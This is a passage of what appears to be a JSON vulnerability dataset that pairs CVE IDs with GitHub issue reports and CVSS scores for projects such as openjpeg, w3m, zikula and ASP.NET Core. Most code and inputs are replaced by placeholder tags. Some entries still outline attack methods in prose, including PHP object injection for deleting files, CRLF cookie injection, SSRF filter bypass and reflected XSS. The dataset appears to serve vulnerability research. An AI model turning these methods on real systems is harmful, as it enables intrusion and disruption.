        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9559",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/298",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/298",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-11-09T16:36:07Z",
        "description": "null pointer passed as argument NUMBERTAG which is declared to never be null (tiff.c). On NUMBERTAG with the security policy enabled: ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9572",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/863",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/863",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-11-02T14:32:30Z",
        "description": "Openjpeg NUMBERTAG APITAG vulnerability due to some logic error. Overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability exists in code responsible for decoding the input image. The vulnerability is caused by an improper assumption: if the decoding process successfully finishes, buffer of each component corresponding to each channel APITAG Green, Blue, Alpha) has already been allocated and filled with data; however, the assumption is not always valid, i.e. these buffers has not been allocated when the decoding process successfully returns. The vulnerability can be viewed as a logic error. The vulnerability can trigger many different crash points by crafting the APITAG image file and cause Denial of Service due to Null Pointer Reference. It\u2019s probably that the vulnerability can cause crashes of some other type and cause more critical impact by crafting the APITAG Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9573",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/862",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/862",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-11-02T14:24:56Z",
        "description": "Openjpeg NUMBERTAG Heap Buffer Overflow Vulnerability due to Insufficient check. overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability is an heap buffer overflow vulnerability, which can cause out of bound read. The vulnerability exists in code responsible for decompressing the input image. The vulnerability is caused by insufficient check: the code have made sure the parameters of RED channel, GREEN channel and BLUE channel are the same, however, does not do it for ALPHA channel, which causes the length of alpha buffer is less than the expected access length. The vulnerability can cause Denial of Service and Information Disclosure and I am not sure whether it can cause RCE. Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9580",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/871",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/871",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-12-07T13:47:43Z",
        "description": "out of bound write issue caused by integer overflow that can occur in function APITAG PATHTAG ).. DESCRIPTION There is an out of bound write issue caused by integer overflow that can occur in function APITAG PATHTAG ). VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff7d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f NUMBERTAG in convert NUMBERTAG u NUMBERTAG s_C1R PATHTAG NUMBERTAG ab in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: chunibalon of VARAS MENTIONTAG email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9581",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/872",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/872",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-12-07T13:50:10Z",
        "description": "out of bound write issue can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG ). DESCRIPTION There is an out of bound write issue can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG APITAG other functions like covert_ _ with trigger this problem). This issue can be caused by a malformed TIFF file. VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG ffff6ef NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG ffff6ef NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in convert NUMBERTAG s_C1P1 PATHTAG NUMBERTAG ce in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: bobb, chunibalon of VARAS MENTIONTAG email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9622",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/32",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/32",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-06T15:05:02Z",
        "description": "null pointer dereference in APITAG input CODETAG gdb log ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9623",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/33",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/33",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-06T15:47:23Z",
        "description": "crash after allocate string of negative size. input CODETAG crash location ERRORTAG With further debugging, I found the value APITAG is coming from the result of APITAG At APITAG line NUMBERTAG of table.c, the result of APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9624",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/35",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/35",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-07T08:24:22Z",
        "description": "dereference near null pointer in APITAG input CODETAG APITAG ERRORTAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9625",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/36",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/36",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-07T08:54:01Z",
        "description": "APITAG infinite recursion. input CODETAG APITAG CODETAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9626",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/37",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/37",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-07T15:41:45Z",
        "description": "infinite recursion in APITAG CODETAG APITAG CODETAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9627",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/38",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/38",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-13T16:02:08Z",
        "description": "heap buffer overflow and bad pointer deref in APITAG input CODETAG APITAG ERRORTAG symbol is allocated in APITAG . Its size is only NUMBERTAG So APITAG is heap buffer overflow read.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9628",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/39",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/39",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-13T16:18:19Z",
        "description": "null pointer deref due to bad form id in APITAG input CODETAG APITAG ERRORTAG I found form is obtained by APITAG earlier CODETAG Although the value of APITAG is validated but APITAG is incorrectly obtained from user input.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9629",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/40",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/40",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-15T06:48:21Z",
        "description": "deref null pointer in APITAG input CODETAG CODETAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9630",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/41",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/41",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-17T05:21:37Z",
        "description": "global buffer overflow in APITAG input CODETAG build with Address sanitizer. the run result: ERRORTAG CODETAG APITAG NUMBERTAG ERRORTAG , but length of APITAG is NUMBERTAG or NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9631",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/42",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/42",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-17T07:06:48Z",
        "description": "null pointer defer in APITAG input CODETAG APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9632",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/43",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/43",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-11-18T01:53:54Z",
        "description": "global buffer overflow in APITAG CODETAG how to reproduce NUMBERTAG build w3m with APITAG URLTAG ( APITAG NUMBERTAG APITAG Asan output ERRORTAG ERRORTAG CODETAG map is APITAG , which is size NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9633",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/23",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/23",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-19T17:38:40Z",
        "description": "memory exhausted due to repeat appending \" APITAG \". ERRORTAG gdb ERRORTAG Two issues NUMBERTAG why w3m repeat appending APITAG to the buffer NUMBERTAG newlen integer overflow in Strgrow and to allocate huge buffer. found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9751",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/559",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/559",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-11-29T13:38:51Z",
        "description": "[security] quick search and criteria display. We need to sanitize search criteria used in quick search before displaying on FILETAG page.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9835",
        "Issue_Url_old": "https://github.com/zikula/core/issues/3237",
        "Issue_Url_new": "https://github.com/zikula/core/issues/3237",
        "Repo_new": "zikula/core",
        "Issue_Created_At": "2016-12-03T03:06:43Z",
        "description": "APITAG file read vulnerability (windows environment). relative codes in APITAG : ERRORTAG On windows platform we can bypass regex filter with APITAG APITAG APITAG the result of APITAG was brought into ERRORTAG , when APITAG is used on user supplied data it often leads to PHP Object Injection . here we can launch further attacks with APITAG in APITAG . APITAG delete files on windows server. Add a public func in class APITAG ERRORTAG Serialize an APITAG object and write it to file: APITAG FILETAG CODETAG Upload APITAG to APITAG folder on windows server. Then request APITAG , and your target file will be deleted. ( APITAG in my test).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9933",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/215",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/215",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-05-25T11:11:05Z",
        "description": "APITAG stack overflow. Invalid color causes stack exhaustion by recursive call to function APITAG when the image used is not truecolor. Source code: URLTAG CODETAG CODETAG Test script: APITAG Expected result: No crash Actual result: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9964",
        "Issue_Url_old": "https://github.com/bottlepy/bottle/issues/913",
        "Issue_Url_new": "https://github.com/bottlepy/bottle/issues/913",
        "Repo_new": "bottlepy/bottle",
        "Issue_Created_At": "2016-12-08T07:29:24Z",
        "description": "APITAG doesn't filter \" \" leads to CRLF attack. Hi, APITAG doesn't filter \" \" which leads to CRLF attack. For example, I use APITAG can set a new cookie in the client side. :P",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-0247",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/239",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/239",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2017-05-09T17:13:10Z",
        "description": "Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege . Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege Executive Summary Microsoft is releasing this security advisory to provide information about vulnerabilities in public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly. .NET Core & ASP.NET Core are the next generation of .NET that provide a familiar and modern framework for web and cloud scenarios. These products are actively developed by the .NET and ASP.NET team in collaboration with a community of open source developers, running on Windows, Mac OS X and Linux. When .NET Core was released, the version number was reset to NUMBERTAG to reflect the fact that it is a separate product from its predecessor .NET. Discussion To discuss the ASP.NET Core issues please see URLTAG To discuss the APITAG Core issues please see URLTAG Issue CVEs and Description CVE | Description | CVETAG CVETAG | Security Feature Bypass CVETAG CVETAG | Denial of Service CVETAG CVETAG | Escalation of Privilege CVETAG CVETAG | Spoofing Affected Software The vulnerabilities affect any Microsoft .NET Core project if it uses the following affected package versions. Package name | Package versions | Fixed package versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. If your project has a direct or transitive dependency on any of the packages and versions listed above, you are affected. Note: As part of patching ASP.NET Core MVC we update every APITAG package. If, for example, you have a dependency on APITAG you should update to the appropriate version first NUMBERTAG should be updated to NUMBERTAG should be updated to NUMBERTAG and it will also update any other vulnerable APITAG dependency. NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG You must ensure you follow the correct update instructions for your project type. Direct Dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by reviewing your APITAG or csproj file. Transitive Dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable in the Visual Studio Solution Explorer window, which supports searching, or by reviewing the APITAG file contained in the root directory of your project for APITAG projects or the APITAG file contained in the obj directory of your project for csproj projects. These files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. How do I fix my affected application? You will need to fix both direct dependencies and review and fix any transitive dependencies. The Affected Packages and Versions above should each vulnerable package, the vulnerable versions and the patched versions. Note : If you are using ASP.NET Core MVC in your projects you should first update the APITAG version according to the affected versions table above. If you are currently using version NUMBERTAG or NUMBERTAG you should update your package version to NUMBERTAG If you are using version NUMBERTAG or NUMBERTAG you should update your package version to NUMBERTAG This will update every MVC package to the fixed versions. Fixing Direct Dependencies \u2013 FILETAG /VS NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Fixing Direct Dependencies \u2013 csproj/VS NUMBERTAG Open your APITAG file in your editor, or right click the project in Visual Studio NUMBERTAG and choose APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an example project file: CODETAG The example has two direct package dependencies, as seen by the two APITAG elements. The name of the package is in the Include attribute, and the package version number is in the Version attribute that is exposed to the right of the package name. The example shows two packages APITAG version NUMBERTAG and APITAG version NUMBERTAG Review your APITAG elements for any instance of the packages and versions listed above. In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package version, save your csproj file. The example csproj would now look as follows: CODETAG If you are using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning, you must update your other direct dependencies to the appropriate version. For example if your project refers to APITAG with a version number of NUMBERTAG when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your csproj or APITAG in the same way that you used to update the vulnerable package versions. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Reviewing Transitive Dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review your APITAG ( FILETAG /VS NUMBERTAG or APITAG (csproj/VS NUMBERTAG file. Using Visual Studio Solution Explorer (VS NUMBERTAG If you want to use Visual Studio NUMBERTAG open your project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. Search for each of the vulnerable package names and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a reference to APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see we have found references to APITAG , version NUMBERTAG ERRORTAG APITAG APITAG APITAG or .NET Framework vX.Y.Z ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In this case the APITAG package takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG ERRORTAG FILETAG APITAG FILETAG file to expand the solution tree to expose the FILETAG file. The following image shows a project with the FILETAG file expanded to show the FILETAG APITAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. For example a search result that shows APITAG APITAG APITAG APITAG FILETAG CODETAG FILETAG file to override the transitive dependency. Open your FILETAG CODETAG FILETAG file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG APITAG FILETAG APITAG APITAG file. If you are using Visual Studio save your updated APITAG CODETAG dotnet restore CODETAG APITAG in an example project that contains a package that takes a dependency on APITAG CODETAG APITAG ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In the example the APITAG package takes a dependency on a version of APITAG which in turn takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. For example a search result that shows APITAG APITAG APITAG APITAG FILETAG file includes references to any of the vulnerable packages shown above then you will need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open your APITAG APITAG APITAG from the content menu, where projectname is the name of your project. Look for APITAG CODETAG csproj file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG CODETAG csproj file. If you are using Visual Studio, save your updated csproj CODETAG dotnet restore` command to restore your new dependencies. Rebuilding your application Finally rebuild your application, test as you would do normally and redeploy using your favored deployment mechanism. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Revisions NUMBERTAG APITAG NUMBERTAG Advisory published.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-0378",
        "Issue_Url_old": "https://github.com/lota/phamm/issues/21",
        "Issue_Url_new": "https://github.com/lota/phamm/issues/21",
        "Repo_new": "lota/phamm",
        "Issue_Created_At": "2017-07-19T23:59:54Z",
        "description": "CVETAG reflected XSS. While looking through APITAG I noticed that phamm's FILETAG uses $_SERVER['PHP_SELF'] in a way that is vulnerable to reflected XSS attacks. To reproduce the problem, load a URL like this in Firefox: URLTAG The Debian Security team assigned this issue CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-0898",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/3722",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/3722",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2017-06-26T18:16:07Z",
        "description": "Heap use after free in mrb_str_format. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-0904",
        "Issue_Url_old": "https://github.com/jtdowney/private_address_check/issues/1",
        "Issue_Url_new": "https://github.com/jtdowney/private_address_check/issues/1",
        "Repo_new": "jtdowney/private_address_check",
        "Issue_Created_At": "2017-11-07T10:54:06Z",
        "description": "Resolv::getaddresses bug allows one to bypass your SSRF filter.. Description APITAG is OS dependent, therefore by playing around with different IP formats one can return blank values. This bug can be abused to bypass your exclusion list. | \ud83d\udcbb Machine NUMBERTAG Machine NUMBERTAG ruby NUMBERTAG p NUMBERTAG linux gnu] | ruby NUMBERTAG p NUMBERTAG linux gnu] | \ud83d\udcbb Machine NUMBERTAG CODETAG \ud83d\udcbb Machine NUMBERTAG CODETAG Proof of concept CODETAG Mitigation I suggest staying away from APITAG altogether and using the Socket class. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-0928",
        "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/35",
        "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/35",
        "Repo_new": "guardian/html-janitor",
        "Issue_Created_At": "2017-10-27T10:01:25Z",
